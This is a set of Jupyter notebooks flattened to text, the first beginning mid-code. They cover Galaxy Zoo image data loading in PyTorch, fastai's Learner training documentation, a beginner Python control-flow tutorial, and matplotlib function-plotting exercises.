df = pd.read_csv(file_csv) df_train, df_temp = train_test_split(df, train_size=f_train, random_state=random_state) relative_f_valid = f_valid/(f_valid+f_test) df_valid, df_test = train_test_split(df_temp, train_size=relative_f_valid, random_state=random_state) if stats: df_stats=df.groupby([label_tag])[label_tag].agg('count').to_frame('count').reset_index() df_stats['full'] = df_stats['count']/df_stats['count'].sum() df_stats['train'] = df_train.groupby([label_tag]).size()/df_train.groupby([label_tag]).size().sum() df_stats['valid'] = df_valid.groupby([label_tag]).size()/df_valid.groupby([label_tag]).size().sum() df_stats['test'] = df_test.groupby([label_tag]).size()/df_test.groupby([label_tag]).size().sum() ax = df_stats.plot.bar(x=label_tag, y=['full', 'train', 'valid', 'test'], rot=0) ax.set_ylabel('class fraction') return df_train.reset_index(drop=True), df_valid.reset_index(drop=True), df_test.reset_index(drop=True) df_train, df_valid, df_test = data_split(file_csv, f_train, f_valid, f_test, random_state=seed, stats=True) df_train ``` ## GalaxyZooDataset ``` # import sys # sys.path.append('../galaxyZooNet/') # from datasets import GalaxyZooDataset import os from PIL import Image from torch.utils.data import Dataset class GalaxyZooDataset(Dataset): '''Galaxy Zoo 2 image dataset Args: dataframe : pd.dataframe, outputs from the data_split function e.g. df_train / df_valid / df_test dir_image : str, path where galaxy images are located label_tag : str, class label system to be used for training e.g. 
label_tag = 'label_8' / 'label_3' ''' def __init__(self, dataframe, dir_image, label_tag='label1', transform=None): self.df = dataframe self.transform = transform self.dir_image = dir_image self.label_tag = label_tag def __getitem__(self, index): galaxyID = self.df.iloc[[index]].galaxyID.values[0] file_img = os.path.join(self.dir_image, str(galaxyID) + '.jpg') image = Image.open(file_img) if self.transform: image = self.transform(image) label = self.df.iloc[[index]][self.label_tag].values[0] return image, label def __len__(self): return len(self.df) ``` ``dir_image`` : path to the [galaxy zoo 2 images](https://www.kaggle.com/jaimetrickz/galaxy-zoo-2-images) ``` dir_image = '/home/hhg/Research/galaxyClassify/catalog/galaxyZoo_kaggle/gz2_images/images' dataset_train = GalaxyZooDataset(df_train, dir_image, label_tag='label_8') i = 34 df_train.iloc[[i]] image_i, label_i = dataset_train[i] print('label1 =',label_i) fig, ax = plt.subplots() ax.imshow(image_i) ax.axis('off') ``` ## dataloader ``` from torch.utils.data import DataLoader import torchvision.transforms as transforms def create_transforms(): input_size = 224 # transforms for training data train_transform = transforms.Compose([transforms.CenterCrop(input_size), transforms.RandomRotation(90), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.RandomResizedCrop(input_size, scale=(0.85, 1.0), ratio=(0.9, 1.1)), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) # transforms for validation data valid_transform = transforms.Compose([transforms.CenterCrop(input_size), transforms.RandomRotation(90), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.RandomResizedCrop(input_size, scale=(0.85, 1.0), ratio=(0.9, 1.1)), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) # transforms for test data test_transform = transforms.Compose([transforms.CenterCrop(input_size), 
transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) return train_transform, valid_transform, test_transform BATCH_SIZE = 64 workers = 2 # create transforms train_transform, valid_transform, test_transform = create_transforms() # create datasets data_train = GalaxyZooDataset(df_train, dir_image, transform=train_transform, label_tag='label1') data_valid = GalaxyZooDataset(df_valid, dir_image, transform=valid_transform, label_tag='label1') data_test = GalaxyZooDataset(df_test , dir_image, transform=test_transform , label_tag='label1') # dataloaders train_loader = DataLoader(data_train, batch_size=BATCH_SIZE, shuffle=True, num_workers=workers) valid_loader = DataLoader(data_valid, batch_size=BATCH_SIZE, shuffle=True, num_workers=workers) test_loader = DataLoader(data_test , batch_size=BATCH_SIZE, shuffle=True, num_workers=workers) # check the sizes print(f'Number of training data: {len(data_train)} ({len(train_loader)} batches)') print(f'Number of validation data: {len(data_valid)} ({len(valid_loader)} batches)') print(f'Number of test data: {len(data_test)} ({len(test_loader)} batches)') ``` ## ------------ compute the mean and std of the galaxy image dataset------------ ``` import torch from tqdm.notebook import tqdm from time import time basic_transform = transforms.Compose([transforms.CenterCrop(224), transforms.ToTensor()]) data_full0 = GalaxyZooDataset(df, dir_image, transform=basic_transform, label_tag='label_8') full_loader0 = DataLoader(data_full0, batch_size=1, shuffle=True, num_workers=2) n_channels = 3 before = time() mean = torch.zeros(n_channels) std = torch.zeros(n_channels) print('==> Computing mean and std..') for images, _labels in tqdm(full_loader0): for i in range(n_channels): mean[i] += images[:,i,:,:].mean() std[i] += images[:,i,:,:].std() mean = mean/len(full_loader0) std = std /len(full_loader0) print('Full galaxy dataset mean :', mean) print('Full galaxy dataset std :', std) ```
github_jupyter
## Basic training functionality ``` from fastai.basic_train import * from fastai.gen_doc.nbdoc import * from fastai.vision import * from fastai.distributed import * ``` [`basic_train`](/basic_train.html#basic_train) wraps together the data (in a [`DataBunch`](/basic_data.html#DataBunch) object) with a PyTorch model to define a [`Learner`](/basic_train.html#Learner) object. Here the basic training loop is defined for the [`fit`](/basic_train.html#fit) method. The [`Learner`](/basic_train.html#Learner) object is the entry point of most of the [`Callback`](/callback.html#Callback) objects that will customize this training loop in different ways. Some of the most commonly used customizations are available through the [`train`](/train.html#train) module, notably: - [`Learner.lr_find`](/train.html#lr_find) will launch an LR range test that will help you select a good learning rate. - [`Learner.fit_one_cycle`](/train.html#fit_one_cycle) will launch a training using the 1cycle policy to help you train your model faster. - [`Learner.to_fp16`](/train.html#to_fp16) will convert your model to half precision and help you launch a training in mixed precision. ``` show_doc(Learner, title_level=2) ``` The main purpose of [`Learner`](/basic_train.html#Learner) is to train `model` using [`Learner.fit`](/basic_train.html#Learner.fit). After every epoch, all *metrics* will be printed and also made available to callbacks. The default weight decay will be `wd`, which will be handled using the method from [Fixing Weight Decay Regularization in Adam](https://arxiv.org/abs/1711.05101) if `true_wd` is set (otherwise it's L2 regularization). If `true_wd` is set it will affect all optimizers, not only Adam. If `bn_wd` is `False`, then weight decay will be removed from batchnorm layers, as recommended in [Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour](https://arxiv.org/abs/1706.02677). If `train_bn`, batchnorm layer learnable params are trained even for frozen layer groups. 
To use [discriminative layer training](#Discriminative-layer-training), pass a list of [`nn.Module`](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) as `layer_groups`; each [`nn.Module`](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) will be used to customize the optimization of the corresponding layer group. If `path` is provided, all the model files created will be saved in `path`/`model_dir`; if not, then they will be saved in `data.path`/`model_dir`. You can pass a list of [`callback`](/callback.html#callback)s that you have already created, or (more commonly) simply pass a list of callback functions to `callback_fns` and each function will be called (passing `self`) on object initialization, with the results stored as callback objects. For a walk-through, see the [training overview](/training.html) page. You may also want to use an [application](applications.html) specific model. For example, if you are dealing with a vision dataset, here the MNIST, you might want to use the [`cnn_learner`](/vision.learner.html#cnn_learner) method: ``` path = untar_data(URLs.MNIST_SAMPLE) data = ImageDataBunch.from_folder(path) learn = cnn_learner(data, models.resnet18, metrics=accuracy) ``` ### Model fitting methods ``` show_doc(Learner.lr_find) ``` Runs the learning rate finder defined in [`LRFinder`](/callbacks.lr_finder.html#LRFinder), as discussed in [Cyclical Learning Rates for Training Neural Networks](https://arxiv.org/abs/1506.01186). ``` learn.lr_find() learn.recorder.plot() show_doc(Learner.fit) ``` Uses [discriminative layer training](#Discriminative-layer-training) if multiple learning rates or weight decay values are passed. To control training behaviour, use the [`callback`](/callback.html#callback) system or one or more of the pre-defined [`callbacks`](/callbacks.html#callbacks). 
``` learn.fit(1) show_doc(Learner.fit_one_cycle) ``` Use cycle length `cyc_len`, a per cycle maximal learning rate `max_lr`, momentum `moms`, division factor `div_factor`, weight decay `wd`, and optional callbacks [`callbacks`](/callbacks.html#callbacks). Uses the [`OneCycleScheduler`](/callbacks.one_cycle.html#OneCycleScheduler) callback. Please refer to [What is 1-cycle](/callbacks.one_cycle.html#What-is-1cycle?) for a conceptual background of 1-cycle training policy and more technical details on what do the method's arguments do. ``` learn.fit_one_cycle(1) ``` ### See results ``` show_doc(Learner.predict) ``` `predict` can be used to get a single prediction from the trained learner on one specific piece of data you are interested in. ``` learn.data.train_ds[0] ``` Each element of the dataset is a tuple, where the first element is the data itself, while the second element is the target label. So to get the data, we need to index one more time. ``` data = learn.data.train_ds[0][0] data pred = learn.predict(data) pred ``` The first two elements of the tuple are, respectively, the predicted class and label. Label here is essentially an internal representation of each class, since class name is a string and cannot be used in computation. To check what each label corresponds to, run: ``` learn.data.classes ``` So category 0 is 3 while category 1 is 7. ``` probs = pred[2] ``` The last element in the tuple is the predicted probabilities. For a categorization dataset, the number of probabilities returned is the same as the number of classes; `probs[i]` is the probability that the `item` belongs to `learn.data.classes[i]`. ``` learn.data.valid_ds[0][0] ``` You could always check yourself if the probabilities given make sense. ``` show_doc(Learner.get_preds) ``` It will run inference using the learner on all the data in the `ds_type` dataset and return the predictions; if `n_batch` is not specified, it will run the predictions on the default batch size. 
If `with_loss`, it will also return the loss on each prediction. Here is how you check the default batch size. ``` learn.data.batch_size preds = learn.get_preds() preds ``` The first element of the tuple is a tensor that contains all the predictions. ``` preds[0] ``` While the second element of the tuple is a tensor that contains all the target labels. ``` preds[1] preds[1][0] ``` For more details about what each number mean, refer to the documentation of [`predict`](/basic_train.html#predict). Since [`get_preds`](/basic_train.html#get_preds) gets predictions on all the data in the `ds_type` dataset, here the number of predictions will be equal to the number of data in the validation dataset. ``` len(learn.data.valid_ds) len(preds[0]), len(preds[1]) ``` To get predictions on the entire training dataset, simply set the `ds_type` argument accordingly. ``` learn.get_preds(ds_type=DatasetType.Train) ``` To also get prediction loss along with the predictions and the targets, set `with_loss=True` in the arguments. ``` learn.get_preds(with_loss=True) ``` Note that the third tensor in the output tuple contains the losses. ``` show_doc(Learner.validate) ``` Return the calculated loss and the metrics of the current model on the given data loader `dl`. The default data loader `dl` is the validation dataloader. You can check the default metrics of the learner using: ``` str(learn.metrics) learn.validate() learn.validate(learn.data.valid_dl) learn.validate(learn.data.train_dl) show_doc(Learner.show_results) ``` Note that the text number on the top is the ground truth, or the target label, the one in the middle is the prediction, while the image number on the bottom is the image data itself. ``` learn.show_results() learn.show_results(ds_type=DatasetType.Train) show_doc(Learner.pred_batch) ``` Note that the number of predictions given equals to the batch size. 
``` learn.data.batch_size preds = learn.pred_batch() len(preds) ``` Since the total number of predictions is too large, we will only look at a part of them. ``` preds[:10] item = learn.data.train_ds[0][0] item batch = learn.data.one_item(item) batch learn.pred_batch(batch=batch) show_doc(Learner.interpret, full_name='interpret') jekyll_note('This function only works in the vision application.') ``` For more details, refer to [ClassificationInterpretation](/vision.learner.html#ClassificationInterpretation) ### Model summary ``` show_doc(Learner.summary) ``` ### Test time augmentation ``` show_doc(Learner.TTA, full_name = 'TTA') ``` Applies Test Time Augmentation to `learn` on the dataset `ds_type`. We take the average of our regular predictions (with a weight `beta`) with the average of predictions obtained through augmented versions of the training set (with a weight `1-beta`). The transforms decided for the training set are applied with a few changes: `scale` controls the scale for zoom (which isn't random), the cropping isn't random but we make sure to get the four corners of the image. Flipping isn't random but applied once on each of those corner images (so that makes 8 augmented versions total). ### Gradient clipping ``` show_doc(Learner.clip_grad) ``` ### Mixed precision training ``` show_doc(Learner.to_fp16) ``` Uses the [`MixedPrecision`](/callbacks.fp16.html#MixedPrecision) callback to train in mixed precision (i.e. forward and backward passes using fp16, with weight updates using fp32), using all [NVIDIA recommendations](https://docs.nvidia.com/deeplearning/sdk/mixed-precision-training/index.html) for ensuring speed and accuracy. ``` show_doc(Learner.to_fp32) ``` ### Distributed training If you want to use distributed training or [`torch.nn.DataParallel`](https://pytorch.org/docs/stable/nn.html#torch.nn.DataParallel) these will directly wrap the model for you. 
``` show_doc(Learner.to_distributed, full_name='to_distributed') show_doc(Learner.to_parallel, full_name='to_parallel') ``` ### Discriminative layer training When fitting a model you can pass a list of learning rates (and/or weight decay amounts), which will apply a different rate to each *layer group* (i.e. the parameters of each module in `self.layer_groups`). See the [Universal Language Model Fine-tuning for Text Classification](https://arxiv.org/abs/1801.06146) paper for details and experimental results in NLP (we also frequently use them successfully in computer vision, but have not published a paper on this topic yet). When working with a [`Learner`](/basic_train.html#Learner) on which you've called `split`, you can set hyperparameters in four ways: 1. `param = [val1, val2 ..., valn]` (n = number of layer groups) 2. `param = val` 3. `param = slice(start,end)` 4. `param = slice(end)` If we chose to set it in way 1, we must specify a number of values exactly equal to the number of layer groups. If we chose to set it in way 2, the chosen value will be repeated for all layer groups. See [`Learner.lr_range`](/basic_train.html#Learner.lr_range) for an explanation of the `slice` syntax). Here's an example of how to use discriminative learning rates (note that you don't actually need to manually call [`Learner.split`](/basic_train.html#Learner.split) in this case, since fastai uses this exact function as the default split for `resnet18`; this is just to show how to customize it): ``` # creates 3 layer groups learn.split(lambda m: (m[0][6], m[1])) # only randomly initialized head now trainable learn.freeze() learn.fit_one_cycle(1) # all layers now trainable learn.unfreeze() # optionally, separate LR and WD for each group learn.fit_one_cycle(1, max_lr=(1e-4, 1e-3, 1e-2), wd=(1e-4,1e-4,1e-1)) show_doc(Learner.lr_range) ``` Rather than manually setting an LR for every group, it's often easier to use [`Learner.lr_range`](/basic_train.html#Learner.lr_range). 
This is a convenience method that returns one learning rate for each layer group. If you pass `slice(start,end)` then the first group's learning rate is `start`, the last is `end`, and the remaining are evenly geometrically spaced. If you pass just `slice(end)` then the last group's learning rate is `end`, and all the other groups are `end/10`. For instance (for our learner that has 3 layer groups): ``` learn.lr_range(slice(1e-5,1e-3)), learn.lr_range(slice(1e-3)) show_doc(Learner.unfreeze) ``` Sets every layer group to *trainable* (i.e. `requires_grad=True`). ``` show_doc(Learner.freeze) ``` Sets every layer group except the last to *untrainable* (i.e. `requires_grad=False`). What does '**the last layer group**' mean? In the case of transfer learning, such as `learn = cnn_learner(data, models.resnet18, metrics=error_rate)`, `learn.model` will print out two large groups of layers: (0) Sequential and (1) Sequential in the following structure. We can consider the last conv layer as the break line between the two groups. ``` Sequential( (0): Sequential( (0): Conv2d(3, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False) (1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) (2): ReLU(inplace) ... 
(conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False) (bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) ) ) ) (1): Sequential( (0): AdaptiveConcatPool2d( (ap): AdaptiveAvgPool2d(output_size=1) (mp): AdaptiveMaxPool2d(output_size=1) ) (1): Flatten() (2): BatchNorm1d(1024, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) (3): Dropout(p=0.25) (4): Linear(in_features=1024, out_features=512, bias=True) (5): ReLU(inplace) (6): BatchNorm1d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) (7): Dropout(p=0.5) (8): Linear(in_features=512, out_features=12, bias=True) ) ) ``` `learn.freeze` freezes the first group and keeps the second or last group free to train, including multiple layers inside (this is why calling it 'group'), as you can see in `learn.summary()` output. How to read the table below, please see [model summary docs](/callbacks.hooks.html#model_summary). ``` ====================================================================== Layer (type) Output Shape Param # Trainable ====================================================================== ... ... ... 
______________________________________________________________________ Conv2d [1, 512, 4, 4] 2,359,296 False ______________________________________________________________________ BatchNorm2d [1, 512, 4, 4] 1,024 True ______________________________________________________________________ AdaptiveAvgPool2d [1, 512, 1, 1] 0 False ______________________________________________________________________ AdaptiveMaxPool2d [1, 512, 1, 1] 0 False ______________________________________________________________________ Flatten [1, 1024] 0 False ______________________________________________________________________ BatchNorm1d [1, 1024] 2,048 True ______________________________________________________________________ Dropout [1, 1024] 0 False ______________________________________________________________________ Linear [1, 512] 524,800 True ______________________________________________________________________ ReLU [1, 512] 0 False ______________________________________________________________________ BatchNorm1d [1, 512] 1,024 True ______________________________________________________________________ Dropout [1, 512] 0 False ______________________________________________________________________ Linear [1, 12] 6,156 True ______________________________________________________________________ Total params: 11,710,540 Total trainable params: 543,628 Total non-trainable params: 11,166,912 ``` ``` show_doc(Learner.freeze_to) ``` From above we know what is layer group, but **what exactly does `freeze_to` do behind the scenes**? The `freeze_to` source code can be understood as the following pseudo-code: ```python def freeze_to(self, n:int)->None: for g in self.layer_groups[:n]: freeze for g in self.layer_groups[n:]: unfreeze ``` In other words, for example, `freeze_to(1)` is to freeze layer group 0 and unfreeze the rest layer groups, and `freeze_to(3)` is to freeze layer groups 0, 1, and 2 but unfreeze the rest layer groups (if there are more layer groups left). 
Both `freeze` and `unfreeze` [sources](https://github.com/fastai/fastai/blob/master/fastai/basic_train.py#L216) are defined using `freeze_to`: - When we say `freeze`, we mean that in the specified layer groups the [`requires_grad`](/torch_core.html#requires_grad) of all layers with weights (except BatchNorm layers) are set `False`, so the layer weights won't be updated during training. - When we say `unfreeze`, we mean that in the specified layer groups the [`requires_grad`](/torch_core.html#requires_grad) of all layers with weights (except BatchNorm layers) are set `True`, so the layer weights will be updated during training. ``` show_doc(Learner.split) ``` A convenience method that sets `layer_groups` based on the result of [`split_model`](/torch_core.html#split_model). If `split_on` is a function, it calls that function and passes the result to [`split_model`](/torch_core.html#split_model) (see above for example). ### Saving and loading models Simply call [`Learner.save`](/basic_train.html#Learner.save) and [`Learner.load`](/basic_train.html#Learner.load) to save and load models. Only the parameters are saved, not the actual architecture (so you'll need to create your model in the same way before loading weights back in). Models are saved to the `path`/`model_dir` directory. ``` show_doc(Learner.save) ``` If argument `name` is a pathlib object that's an absolute path, it'll override the default base directory (`learn.path`), otherwise the model will be saved in a file relative to `learn.path`. ``` learn.save("trained_model") learn.save("trained_model", return_path=True) show_doc(Learner.load) ``` This method only works after `save` (don't confuse with `export`/[`load_learner`](/basic_train.html#load_learner) pair). If the `purge` argument is `True` (default) `load` internally calls `purge` with `clear_opt=False` to preserve `learn.opt`. 
``` learn = learn.load("trained_model") ``` ### Deploying your model When you are ready to put your model in production, export the minimal state of your [`Learner`](/basic_train.html#Learner) with: ``` show_doc(Learner.export) ``` If argument `fname` is a pathlib object that's an absolute path, it'll override the default base directory (`learn.path`), otherwise the model will be saved in a file relative to `learn.path`. Passing `destroy=True` will destroy the [`Learner`](/basic_train.html#Learner), freeing most of its memory consumption. For specifics see [`Learner.destroy`](/basic_train.html#Learner.destroy). This method only works with the [`Learner`](/basic_train.html#Learner) whose [`data`](/vision.data.html#vision.data) was created through the [data block API](/data_block.html). Otherwise, you will have to create a [`Learner`](/basic_train.html#Learner) yourself at inference and load the model with [`Learner.load`](/basic_train.html#Learner.load). ``` learn.export() learn.export('trained_model.pkl') path = learn.path path show_doc(load_learner) ``` This function only works after `export` (don't confuse with `save`/`load` pair). The `db_kwargs` will be passed to the call to `databunch` so you can specify a `bs` for the test set, or `num_workers`. ``` learn = load_learner(path) learn = load_learner(path, 'trained_model.pkl') ``` WARNING: If you used any customized classes when creating your learner, you must define these classes first before executing [`load_learner`](/basic_train.html#load_learner). You can find more information and multiple examples in [this tutorial](/tutorial.inference.html). ### Freeing memory If you want to be able to do more without needing to restart your notebook, the following methods are designed to free memory when it's no longer needed. Refer to [this tutorial](/tutorial.resources.html) to learn how and when to use these methods. 
``` show_doc(Learner.purge) ``` If `learn.path` is read-only, you can set `model_dir` attribute in Learner to a full `libpath` path that is writable (by setting `learn.model_dir` or passing `model_dir` argument in the [`Learner`](/basic_train.html#Learner) constructor). ``` show_doc(Learner.destroy) ``` If you need to free the memory consumed by the [`Learner`](/basic_train.html#Learner) object, call this method. It can also be automatically invoked through [`Learner.export`](/basic_train.html#Learner.export) via its `destroy=True` argument. ### Other methods ``` show_doc(Learner.init) ``` Initializes all weights (except batchnorm) using function `init`, which will often be from PyTorch's [`nn.init`](https://pytorch.org/docs/stable/nn.html#torch-nn-init) module. ``` show_doc(Learner.mixup) ``` Uses [`MixUpCallback`](/callbacks.mixup.html#MixUpCallback). ``` show_doc(Learner.backward) show_doc(Learner.create_opt) ``` You generally won't need to call this yourself - it's used to create the [`optim`](https://pytorch.org/docs/stable/optim.html#module-torch.optim) optimizer before fitting the model. ``` show_doc(Learner.dl) learn.dl() learn.dl(DatasetType.Train) show_doc(Recorder, title_level=2) ``` A [`Learner`](/basic_train.html#Learner) creates a [`Recorder`](/basic_train.html#Recorder) object automatically - you do not need to explicitly pass it to `callback_fns` - because other callbacks rely on it being available. It stores the smoothed loss, hyperparameter values, and metrics for each batch, and provides plotting methods for each. Note that [`Learner`](/basic_train.html#Learner) automatically sets an attribute with the snake-cased name of each callback, so you can access this through `Learner.recorder`, as shown below. ### Plotting methods ``` show_doc(Recorder.plot) ``` This is mainly used with the learning rate finder, since it shows a scatterplot of loss vs learning rate. 
``` path = untar_data(URLs.MNIST_SAMPLE) data = ImageDataBunch.from_folder(path) learn = cnn_learner(data, models.resnet18, metrics=accuracy) learn.lr_find() learn.recorder.plot() show_doc(Recorder.plot_losses) ``` Note that validation losses are only calculated once per epoch, whereas training losses are calculated after every batch. ``` learn.fit_one_cycle(5) learn.recorder.plot_losses() show_doc(Recorder.plot_lr) learn.recorder.plot_lr() learn.recorder.plot_lr(show_moms=True) show_doc(Recorder.plot_metrics) ``` Note that metrics are only collected at the end of each epoch, so you'll need to train at least two epochs to have anything to show here. ``` learn.recorder.plot_metrics() ``` ### Callback methods You don't call these yourself - they're called by fastai's [`Callback`](/callback.html#Callback) system automatically to enable the class's functionality. Refer to [`Callback`](/callback.html#Callback) for more details. ``` show_doc(Recorder.on_backward_begin) show_doc(Recorder.on_batch_begin) show_doc(Recorder.on_epoch_end) show_doc(Recorder.on_train_begin) ``` ### Inner functions The following functions are used along the way by the [`Recorder`](/basic_train.html#Recorder) or can be called by other callbacks. ``` show_doc(Recorder.add_metric_names) show_doc(Recorder.format_stats) ``` ## Module functions Generally you'll want to use a [`Learner`](/basic_train.html#Learner) to train your model, since they provide a lot of functionality and make things easier. However, for ultimate flexibility, you can call the same underlying functions that [`Learner`](/basic_train.html#Learner) calls behind the scenes: ``` show_doc(fit) ``` Note that you have to create the [`Optimizer`](https://pytorch.org/docs/stable/optim.html#torch.optim.Optimizer) yourself if you call this function, whereas [`Learn.fit`](/basic_train.html#fit) creates it for you automatically. 
``` show_doc(train_epoch) ``` You won't generally need to call this yourself - it's what [`fit`](/basic_train.html#fit) calls for each epoch. ``` show_doc(validate) ``` This is what [`fit`](/basic_train.html#fit) calls after each epoch. You can call it if you want to run inference on a [`DataLoader`](https://pytorch.org/docs/stable/data.html#torch.utils.data.DataLoader) manually. ``` show_doc(get_preds) show_doc(loss_batch) ``` You won't generally need to call this yourself - it's what [`fit`](/basic_train.html#fit) and [`validate`](/basic_train.html#validate) call for each batch. It only does a backward pass if you set `opt`. ## Other classes ``` show_doc(LearnerCallback, title_level=3) show_doc(RecordOnCPU, title_level=3) ``` ## Open This Notebook <button style="display: flex; align-item: center; padding: 4px 8px; font-size: 14px; font-weight: 700; color: #1976d2; cursor: pointer;" onclick="window.location.href = 'https://console.cloud.google.com/mlengine/notebooks/deploy-notebook?q=download_url%3Dhttps%253A%252F%252Fraw.githubusercontent.com%252Ffastai%252Ffastai%252Fmaster%252Fdocs_src%252Fbasic_train.ipynb';"><img src="https://www.gstatic.com/images/branding/product/1x/cloud_24dp.png" /><span style="line-height: 24px; margin-left: 10px;">Open in GCP Notebooks</span></button> ## Undocumented Methods - Methods moved below this line will intentionally be hidden ``` show_doc(Learner.tta_only) show_doc(Learner.TTA) show_doc(RecordOnCPU.on_batch_begin) ``` ## New Methods - Please document or move to the undocumented section
github_jupyter
### Conditional Statement * if * if-else * if-elif-else ### Loops and Iterations * for * while ### Recursion * Function calling itself ### Break * Stop iteration ### Continue * Stop current iteration ### Pass * Passing for non-executable condition 📌After using **:**, it is necessary to indent each statement by 4 spaces to keep it inside the loop/conditional statement <h3>⭐if</h3> ``` if True: print("Hello") #carefully look at the shift of 4 whitespace if False: print('Hello, World!') num = 2 if num > 0: print('It is possible to print') if num >= 0 or num <= 3: print('It is possible to print') if num >= 0 and num <= 3: print('It is possible to print') if num >= 0 or num >= 4: print('It is possible to print') if num >= 0 and num >= 4: print('It is not possible to print') ``` <h3>⭐if-else</h3> ``` if False: print('False statement') else: print('True statement') num = 5 if num > 6: print('greater than 6') else: print('not greater than 6') if num < 6: if num > 3: print('smaller than 6 but greater than 3') if num < 3: print('smaller than 6 but not than 3') else: print('greater than 6') if num > 6: if num > 3: print('smaller than 6 but greater than 3') if num < 3: print('smaller than 6 but not than 3') else: if num > 3: print('smaller than or equal to 6 but greater than 3') ``` <h3>⭐if-elif-else</h3> ``` a = 60 b = 70 c = 80 d = 90 e = 95 num = 100 if num <= a: print(num,'is less than equal to',a) elif num <= b: print(num,'is less than equal to',b) elif num <= c: print(num,'is less than equal to',c) elif num <= d: print(num,'is less than equal to',b) else: print('What\'s going on...') a = 10 if a == 5: print('a is equal to',a) elif a ==10: print('a is equal to',a) else: print('I don\'t know') ``` <h3>⭐For-loop</h3> ``` for i in range(10): #📌range() is built-in function starting from 0 to n-1 print(i) print('outside of loop') print(range(1,10)) print(list(range(10))) print(list(range(1,10))) for i in range(5): for j in range(5): print('i =',i,'j =',j) lis = [1,2,3,4,5,6,7,8,9,10] 
sum = 0 for i in lis: sum += i print('Now the sum is',sum) for i in 'Hello, World!': print(i) for i in [1,2.3, '4',[12,34],(1,23,4),{1,23,4},{'1':'one'}]: print('Datatype of',i,'is',type(i)) ``` <h3>⭐While-loop</h3> Executes until a condition is True ``` n = 32 while n <= 37: print('Executed because value of n is',n,'which is <= 37') n += 1 temp = True i = 1 while temp: print('Hey, I\'m inside the while loop') if i == 5: temp = False print('Now, temp became False and I have to come out of while loop') i += 1 ``` <h3>⭐Recursion</h3> In recursion, a function calls itself. ``` # Sum of numbers def sum_temp(n): if n == 1: #base condition return 1 return n + sum_temp(n-1) # 3 + 2 + 1 = 6 sum_temp(3) # Factorial def fact(n): if n == 0: return 1 return n*fact(n-1) fact(3) ``` <h3>⭐Break</h3> ...stopping iteration ``` for i in range(10): print('The value of i is',i) if i == 5: print('Breaking because i is',5) break #No execution for 6,7,8,9 ``` <h3>⭐Continue</h3> ...stopping current iteration ``` for i in range(10): if i>5: continue else: print('still running') ``` <h3>⭐Pass</h3> Useful if we will write some code inside a block but not now ``` for i in range(10): pass ```
github_jupyter
``` #1. Use matplotlib to plot the following equation: # y = x^2 -x + 2 #You'll need to write the code that generates the x and y points. #Add an anotation for the point 0, 0, the origin. import matplotlib.pyplot as plt x = list(range(-50, 50)) # generate our y values y = [(n ** 2 - n + 2) for n in x] plt.plot(x, y) # title plt.title('$y = x^{2} - x + 2$') # annotate the origin plt.annotate('Origin', xy=(0, 0), xytext=(-5, 500)) plt.show() #2. Create and label 4 separate charts for the following equations #(choose a range for x that makes sense): y = √x y = x^3 y= 2^x y= 1/(x +1) from math import sqrt # When sqrt involved x cannot be less than 0 x = list(range(0, 50)) # generate y y = [sqrt(n) for n in x] plt.plot(x, y) plt.title('$\sqrt{x}$') plt.xlabel('$x$') plt.ylabel('$y$') plt.show() #Plot x ** 3 # range of x x = list(range(-10, 10)) # generate y y = [n ** 3 for n in x] plt.plot(x, y) plt.title('$x^{3}$') plt.xlabel('$x$') plt.ylabel('$y$') plt.show() #Plot y= 2 ** x # set range for x x = list(range(-10, 10)) # generate y y = [2 ** n for n in x] # plot x and y plt.plot(x, y) plt.title('$2^{x}$') plt.xlabel('$x$') plt.ylabel('$y$') plt.show() #Plot y= 1/(x +1) # set range for x x = list(range(0, 10)) # generate y y = [1/(n +1) for n in x] # plot x and y plt.plot(x, y) plt.title('$1/(x +1)$') plt.xlabel('$x$') plt.ylabel('$y$') plt.show() #3. Combine the figures you created in the last step into one large figure with 4 subplots. 
plt.figure(figsize = (20, 10)) # plot $\sqrt{x}$ plt.subplot(2, 2, 1) # # When sqrt involved x cannot be less than 0 x = list(range(0, 50)) # generate y y = [sqrt(n) for n in x] plt.plot(x, y) plt.title('$\sqrt{x}$') plt.ylabel('$y$') # plot x ** 3 plt.subplot(2, 2, 2) # range of x x = list(range(-10, 10)) # generate y y = [n ** 3 for n in x] plt.plot(x, y) plt.title('$x^{3}$') plt.xlabel('$x$') # plot y= 2 ** x plt.subplot(2, 2, 3) # set range for x x = list(range(-10, 10)) # generate y y = [2 ** n for n in x] # plot x and y plt.plot(x, y) plt.title('$2^{x}$') plt.xlabel('$x$') plt.ylabel('$y$') #Plot y= 1/(x +1) plt.subplot(2,2,4) # set range for x x = list(range(0, 10)) # generate y y = [1/(n +1) for n in x] # plot x and y plt.plot(x, y) plt.title('$1/(x +1)$') plt.xlabel('$x$') plt.ylabel('$y$') plt.show() #4. Combine the figures you created in the last step into : #-- One figure where each of the 4 equations has a different color for the points. #-- Be sure to include a legend and an appropriate title for the figure. x = list(range(0, 30)) # generate y for each fucntion y1 = [sqrt(n) for n in x] y2 = [n**3 for n in x] y3 = [2**n for n in x] y4 = [1/(n +1) for n in x] plt.plot(x, y1, c='slategray', label='$\sqrt{x}$', alpha=0.7) plt.plot(x, y2, c='cadetblue', label='$x^{3}$', alpha=0.6) plt.plot(x, y3, c='firebrick', label='$2^{x}$', alpha=0.5) plt.plot(x, y4, c='darkgoldenrod', label='$1/(x +1)$', alpha=0.5) plt.ylim(0, 15) plt.xlim(0, 15) plt.ylabel('$y$') plt.xlabel('$x$') plt.title('All Figures Combined') plt.legend() plt.show() ```
github_jupyter
